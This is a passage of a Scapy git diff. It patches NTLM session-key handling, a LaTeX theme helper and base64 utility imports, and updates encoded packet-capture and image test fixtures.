7: KDC_ERR_S_PRINCIPAL_UNKNOWN # 13: KDC_ERR_BADOPTION # 18: KDC_ERR_CLIENT_REVOKED # 29: KDC_ERR_SVC_UNAVAILABLE diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 9f26988fa0c..efabef3cc8d 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -1674,8 +1674,14 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): # [MS-NLMP] sect 3.2.5.1.2 KeyExchangeKey = SessionBaseKey # Only true for NTLMv2 if auth_tok.NegotiateFlags.NEGOTIATE_KEY_EXCH: + if not auth_tok.EncryptedRandomSessionKeyLen: + # No EncryptedRandomSessionKey. libcurl for instance + # hmm. this looks bad + EncryptedRandomSessionKey = b"\x00" * 16 + else: + EncryptedRandomSessionKey = auth_tok.EncryptedRandomSessionKey ExportedSessionKey = RC4K( - KeyExchangeKey, auth_tok.EncryptedRandomSessionKey + KeyExchangeKey, EncryptedRandomSessionKey ) else: ExportedSessionKey = KeyExchangeKey diff --git a/scapy/themes.py b/scapy/themes.py index 61a295fd185..7124bf0c26d 100644 --- a/scapy/themes.py +++ b/scapy/themes.py @@ -314,7 +314,7 @@ def __getattr__(self, attr: str) -> _ColorFormatterType: styler = super(LatexTheme, self).__getattr__(attr) return cast( _ColorFormatterType, - lambda x, *args, **kwargs: styler(tex_escape(x), *args, **kwargs), + lambda x, *args, **kwargs: styler(tex_escape(str(x)), *args, **kwargs), ) diff --git a/scapy/utils.py b/scapy/utils.py index c361ca02bbf..f36e5bd681a 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -13,8 +13,9 @@ from itertools import zip_longest from uuid import UUID -import array import argparse +import array +import base64 import collections import decimal import difflib @@ -44,8 +45,6 @@ orb, plain_str, chb, - bytes_base64, - base64_bytes, hex_bytes, bytes_encode, ) @@ -1229,7 +1228,7 @@ def __repr__(self): def export_object(obj): # type: (Any) -> None import zlib - print(bytes_base64(zlib.compress(pickle.dumps(obj, 2), 9))) + print(base64.b64encode(zlib.compress(pickle.dumps(obj, 2), 9)).decode()) def import_object(obj=None): @@ -1237,7 +1236,7 @@ def import_object(obj=None): import zlib if obj is None: obj = sys.stdin.read() - return pickle.loads(zlib.decompress(base64_bytes(obj.strip()))) # noqa: E501 + return pickle.loads(zlib.decompress(base64.b64decode(obj.strip()))) def save_object(fname, obj): diff --git a/test/regression.uts b/test/regression.uts index 1cf742e68bb..e182f92b96e 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2190,7 +2190,7 @@ pcapfile = BytesIO(b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0 pcapngfile = BytesIO(b'\n\r\r\n\\\x00\x00\x00M<+\x1a\x01\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x01\x00,\x00File created by merging: \nFile1: test.pcap \n\x04\x00\x08\x00mergecap\x00\x00\x00\x00\\\x00\x00\x00\x01\x00\x00\x00\\\x00\x00\x00e\x00\x00\x00\xff\xff\x00\x00\x02\x006\x00Unknown/not available in original file format(libpcap)\x00\x00\t\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\\\x00\x00\x00\x06\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00\x8d*\x05\x00/\xfc[\xcd(\x00\x00\x00(\x00\x00\x00E\x00\x00(\x00\x01\x00\x00@\x06|\xcd\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x91|\x00\x00H\x00\x00\x00\x06\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x8d*\x05\x00\x1f\xff[\xcd\x1c\x00\x00\x00\x1c\x00\x00\x00E\x00\x00\x1c\x00\x01\x00\x00@\x11|\xce\x7f\x00\x00\x01\x7f\x00\x00\x01\x005\x005\x00\x08\x01r<\x00\x00\x00\x06\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x8d*\x05\x00\xb9\x02\\\xcd\x1c\x00\x00\x00\x1c\x00\x00\x00E\x00\x00\x1c\x00\x01\x00\x00@\x01|\xde\x7f\x00\x00\x01\x7f\x00\x00\x01\x08\x00\xf7\xff\x00\x00\x00\x00<\x00\x00\x00') pcapnanofile = BytesIO(b"M<\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00e\x00\x00\x00\xcf\xc5\xacV\xc9\xc1\xb5'(\x00\x00\x00(\x00\x00\x00E\x00\x00(\x00\x01\x00\x00@\x06|\xcd\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x91|\x00\x00\xcf\xc5\xacV-;\xc1'\x1c\x00\x00\x00\x1c\x00\x00\x00E\x00\x00\x1c\x00\x01\x00\x00@\x11|\xce\x7f\x00\x00\x01\x7f\x00\x00\x01\x005\x005\x00\x08\x01r\xcf\xc5\xacV\x9aL\xcf'\x1c\x00\x00\x00\x1c\x00\x00\x00E\x00\x00\x1c\x00\x01\x00\x00@\x01|\xde\x7f\x00\x00\x01\x7f\x00\x00\x01\x08\x00\xf7\xff\x00\x00\x00\x00") pcapwirelenfile = BytesIO(b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\x01\x00\x00\x00}\x87pZ.\xa2\x08\x00\x0f\x00\x00\x00\x10\x00\x00\x00\xff\xff\xff\xff\xff\xff GG\xee\xdd\xa8\x90\x00a') -pcapngdefaults = BytesIO(base64_bytes(b'Cg0NChwAAABNPCsaAQAAAP//////////HAAAAAEAAAAgAAAAEgEAAP//AAAJAAEACUeZiQAAAAAgAAAAAQAAACAAAAASAQAA//8AAAkAAQAJAAAAAAAAACAAAAABAAAAIAAAABIBAAD//wAACQABAAkAAAAAAAAAIAAAAAEAAAAgAAAAEgEAAP//AAAJAAEACQAAAAAAAAAgAAAABgAAAIQBAAADAAAApO/bFdgJaeBiAQAAYgEAAFVVVVVVVVXV////////IMbr4D7PCABFAAFIlQkAAEAR5JwAAAAA/////wBEAEMBNJDsAQEGAFSpVwIACoAAAAAAAAAAAAAAAAAAAAAAACDG6+A+zwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEB/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsOs+bAAAhAEAAAYAAACAAQAAAwAAAKTv2xXIDYznYAEAAGABAABVVVVVVVVV1QEAXn//+iDG6+A+zwgARQABRgGPAAAEEal3qf5wqO////rhbgdsATJi0U5PVElGWSAqIEhUVFAvMS4xDQpIT1NUOiAyMzkuMjU1LjI1NS4yNTA6MTkwMA0KQ0FDSEUtQ09OVFJPTDogbWF4LWFnZT0xODAwDQpMT0NBVElPTjogaHR0cDovLzE2OS4yNTQuMTEyLjE2ODo1NTAwMC9ucmMvZGRkLnhtbA0KTlQ6IHV1aWQ6NEQ0NTQ5MzAtMDIwMC0xMDAwLTgwMDEtMjBDNkVCRTAzRUNGDQpOVFM6IHNzZHA6YWxpdmUNClNFUlZFUjogRnJlZUJTRC84LjAgVVBuUC8xLjAgUGFuYXNvbmljLU1JTC1ETE5BLVNWLzEuMA0KVVNOOiB1dWlkOjRENDU0OTMwLTAyMDAtMTAwMC04MDAxLTIwQzZFQkUwM0VDRg0KDQpcQcvWgAEAAAYAAAC4AQAAAwAAAKTv2xV4Ao3nlQEAAJUBAABVVVVVVVVV1QEAXn//+iDG6+A+zwgARQABewGQAAAEEalBqf5wqO////rhbgdsAWfu+k5PVElGWSAqIEhUVFAvMS4xDQpIT1NUOiAyMzkuMjU1LjI1NS4yNTA6MTkwMA0KQ0FDSEUtQ09OVFJPTDogbWF4LWFnZT0xODAwDQpMT0NBVElPTjogaHR0cDovLzE2OS4yNTQuMTEyLjE2ODo1NTAwMC9ucmMvZGRkLnhtbA0KTlQ6IHVybjpwYW5hc29uaWMtY29tOmRldmljZTpwMDBSZW1vdGVDb250cm9sbGVyOjENCk5UUzogc3NkcDphbGl2ZQ0KU0VSVkVSOiBGcmVlQlNELzguMCBVUG5QLzEuMCBQYW5hc29uaWMtTUlMLURMTkEtU1YvMS4wDQpVU046IHV1aWQ6NEQ0NTQ5MzAtMDIwMC0xMDAwLTgwMDEtMjBDNkVCRTAzRUNGOjp1cm46cGFuYXNvbmljLWNvbTpkZXZpY2U6cDAwUmVtb3RlQ29udHJvbGxlcjoxDQoNCrLVKmoAAAC4AQAABgAAAHgBAAADAAAApO/bFVjbjedXAQAAVwEAAFVVVVVVVVXVAQBef//6IMbr4D7PCABFAAE9AZEAAAQRqX6p/nCo7///+uFuB2wBKaZATk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkxPQ0FUSU9OOiBodHRwOi8vMTY5LjI1NC4xMTIuMTY4OjU1MDAwL25yYy9kZGQueG1sDQpOVDogdXBucDpyb290ZGV2aWNlDQpOVFM6IHNzZHA6YWxpdmUNClNFUlZFUjogRnJlZUJTRC84LjAgVVBuUC8xLjAgUGFuYXNvbmljLU1JTC1ETE5BLVNWLzEuMA0KVVNOOiB1dWlkOjRENDU0OTMwLTAyMDAtMTAwMC04MDAxLTIwQzZFQkUwM0VDRjo6dXBucDpyb290ZGV2aWNlDQoNCjagXoUAeAEAAAYAAAC0AQAAAwAAAKTv2xXYw47nkwEAAJMBAABVVVVVVVVV1QEAXn//+iDG6+A+zwgARQABeQGSAAAEEalBqf5wqO////rhbgdsAWWV4E5PVElGWSAqIEhUVFAvMS4xDQpIT1NUOiAyMzkuMjU1LjI1NS4yNTA6MTkwMA0KQ0FDSEUtQ09OVFJPTDogbWF4LWFnZT0xODAwDQpMT0NBVElPTjogaHR0cDovLzE2OS4yNTQuMTEyLjE2ODo1NTAwMC9ucmMvZGRkLnhtbA0KTlQ6IHVybjpwYW5hc29uaWMtY29tOnNlcnZpY2U6cDAwTmV0d29ya0NvbnRyb2w6MQ0KTlRTOiBzc2RwOmFsaXZlDQpTRVJWRVI6IEZyZWVCU0QvOC4wIFVQblAvMS4wIFBhbmFzb25pYy1NSUwtRExOQS1TVi8xLjANClVTTjogdXVpZDo0RDQ1NDkzMC0wMjAwLTEwMDAtODAwMS0yMEM2RUJFMDNFQ0Y6OnVybjpwYW5hc29uaWMtY29tOnNlcnZpY2U6cDAwTmV0d29ya0NvbnRyb2w6MQ0KDQovXKFrALQBAAAGAAAAqAEAAAMAAACk79sVuJKP54cBAACHAQAAVVVVVVVVVdUBAF5///ogxuvgPs8IAEUAAW0BkwAABBGpTKn+cKjv///64W4HbAFZRNJOT1RJRlkgKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCkNBQ0hFLUNPTlRST0w6IG1heC1hZ2U9MTgwMA0KTE9DQVRJT046IGh0dHA6Ly8xNjkuMjU0LjExMi4xNjg6NTUwMDAvbnJjL2RkZC54bWwNCk5UOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENCk5UUzogc3NkcDphbGl2ZQ0KU0VSVkVSOiBGcmVlQlNELzguMCBVUG5QLzEuMCBQYW5hc29uaWMtTUlMLURMTkEtU1YvMS4wDQpVU046IHV1aWQ6NEQ0NTQ5MzAtMDIwMC0xMDAwLTgwMDEtMjBDNkVCRTAzRUNGOjp1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENCg0KLn5A6QCoAQAA')) +pcapngdefaults = BytesIO(base64.b64decode(b'Cg0NChwAAABNPCsaAQAAAP//////////HAAAAAEAAAAgAAAAEgEAAP//AAAJAAEACUeZiQAAAAAgAAAAAQAAACAAAAASAQAA//8AAAkAAQAJAAAAAAAAACAAAAABAAAAIAAAABIBAAD//wAACQABAAkAAAAAAAAAIAAAAAEAAAAgAAAAEgEAAP//AAAJAAEACQAAAAAAAAAgAAAABgAAAIQBAAADAAAApO/bFdgJaeBiAQAAYgEAAFVVVVVVVVXV////////IMbr4D7PCABFAAFIlQkAAEAR5JwAAAAA/////wBEAEMBNJDsAQEGAFSpVwIACoAAAAAAAAAAAAAAAAAAAAAAACDG6+A+zwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEB/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsOs+bAAAhAEAAAYAAACAAQAAAwAAAKTv2xXIDYznYAEAAGABAABVVVVVVVVV1QEAXn//+iDG6+A+zwgARQABRgGPAAAEEal3qf5wqO////rhbgdsATJi0U5PVElGWSAqIEhUVFAvMS4xDQpIT1NUOiAyMzkuMjU1LjI1NS4yNTA6MTkwMA0KQ0FDSEUtQ09OVFJPTDogbWF4LWFnZT0xODAwDQpMT0NBVElPTjogaHR0cDovLzE2OS4yNTQuMTEyLjE2ODo1NTAwMC9ucmMvZGRkLnhtbA0KTlQ6IHV1aWQ6NEQ0NTQ5MzAtMDIwMC0xMDAwLTgwMDEtMjBDNkVCRTAzRUNGDQpOVFM6IHNzZHA6YWxpdmUNClNFUlZFUjogRnJlZUJTRC84LjAgVVBuUC8xLjAgUGFuYXNvbmljLU1JTC1ETE5BLVNWLzEuMA0KVVNOOiB1dWlkOjRENDU0OTMwLTAyMDAtMTAwMC04MDAxLTIwQzZFQkUwM0VDRg0KDQpcQcvWgAEAAAYAAAC4AQAAAwAAAKTv2xV4Ao3nlQEAAJUBAABVVVVVVVVV1QEAXn//+iDG6+A+zwgARQABewGQAAAEEalBqf5wqO////rhbgdsAWfu+k5PVElGWSAqIEhUVFAvMS4xDQpIT1NUOiAyMzkuMjU1LjI1NS4yNTA6MTkwMA0KQ0FDSEUtQ09OVFJPTDogbWF4LWFnZT0xODAwDQpMT0NBVElPTjogaHR0cDovLzE2OS4yNTQuMTEyLjE2ODo1NTAwMC9ucmMvZGRkLnhtbA0KTlQ6IHVybjpwYW5hc29uaWMtY29tOmRldmljZTpwMDBSZW1vdGVDb250cm9sbGVyOjENCk5UUzogc3NkcDphbGl2ZQ0KU0VSVkVSOiBGcmVlQlNELzguMCBVUG5QLzEuMCBQYW5hc29uaWMtTUlMLURMTkEtU1YvMS4wDQpVU046IHV1aWQ6NEQ0NTQ5MzAtMDIwMC0xMDAwLTgwMDEtMjBDNkVCRTAzRUNGOjp1cm46cGFuYXNvbmljLWNvbTpkZXZpY2U6cDAwUmVtb3RlQ29udHJvbGxlcjoxDQoNCrLVKmoAAAC4AQAABgAAAHgBAAADAAAApO/bFVjbjedXAQAAVwEAAFVVVVVVVVXVAQBef//6IMbr4D7PCABFAAE9AZEAAAQRqX6p/nCo7///+uFuB2wBKaZATk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkxPQ0FUSU9OOiBodHRwOi8vMTY5LjI1NC4xMTIuMTY4OjU1MDAwL25yYy9kZGQueG1sDQpOVDogdXBucDpyb290ZGV2aWNlDQpOVFM6IHNzZHA6YWxpdmUNClNFUlZFUjogRnJlZUJTRC84LjAgVVBuUC8xLjAgUGFuYXNvbmljLU1JTC1ETE5BLVNWLzEuMA0KVVNOOiB1dWlkOjRENDU0OTMwLTAyMDAtMTAwMC04MDAxLTIwQzZFQkUwM0VDRjo6dXBucDpyb290ZGV2aWNlDQoNCjagXoUAeAEAAAYAAAC0AQAAAwAAAKTv2xXYw47nkwEAAJMBAABVVVVVVVVV1QEAXn//+iDG6+A+zwgARQABeQGSAAAEEalBqf5wqO////rhbgdsAWWV4E5PVElGWSAqIEhUVFAvMS4xDQpIT1NUOiAyMzkuMjU1LjI1NS4yNTA6MTkwMA0KQ0FDSEUtQ09OVFJPTDogbWF4LWFnZT0xODAwDQpMT0NBVElPTjogaHR0cDovLzE2OS4yNTQuMTEyLjE2ODo1NTAwMC9ucmMvZGRkLnhtbA0KTlQ6IHVybjpwYW5hc29uaWMtY29tOnNlcnZpY2U6cDAwTmV0d29ya0NvbnRyb2w6MQ0KTlRTOiBzc2RwOmFsaXZlDQpTRVJWRVI6IEZyZWVCU0QvOC4wIFVQblAvMS4wIFBhbmFzb25pYy1NSUwtRExOQS1TVi8xLjANClVTTjogdXVpZDo0RDQ1NDkzMC0wMjAwLTEwMDAtODAwMS0yMEM2RUJFMDNFQ0Y6OnVybjpwYW5hc29uaWMtY29tOnNlcnZpY2U6cDAwTmV0d29ya0NvbnRyb2w6MQ0KDQovXKFrALQBAAAGAAAAqAEAAAMAAACk79sVuJKP54cBAACHAQAAVVVVVVVVVdUBAF5///ogxuvgPs8IAEUAAW0BkwAABBGpTKn+cKjv///64W4HbAFZRNJOT1RJRlkgKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCkNBQ0hFLUNPTlRST0w6IG1heC1hZ2U9MTgwMA0KTE9DQVRJT046IGh0dHA6Ly8xNjkuMjU0LjExMi4xNjg6NTUwMDAvbnJjL2RkZC54bWwNCk5UOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENCk5UUzogc3NkcDphbGl2ZQ0KU0VSVkVSOiBGcmVlQlNELzguMCBVUG5QLzEuMCBQYW5hc29uaWMtTUlMLURMTkEtU1YvMS4wDQpVU046IHV1aWQ6NEQ0NTQ5MzAtMDIwMC0xMDAwLTgwMDEtMjBDNkVCRTAzRUNGOjp1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENCg0KLn5A6QCoAQAA')) = Read a pcap file pktpcap = rdpcap(pcapfile) diff --git a/test/scapy/layers/http.uts b/test/scapy/layers/http.uts index 3313e6b6150..5a80a0f4ab7 100644 --- a/test/scapy/layers/http.uts +++ b/test/scapy/layers/http.uts @@ -33,7 +33,7 @@ assert a[29].Reason_Phrase == b"OK" assert len(a[29].load) == 33653 # According to wireshark: wireshark_data = b'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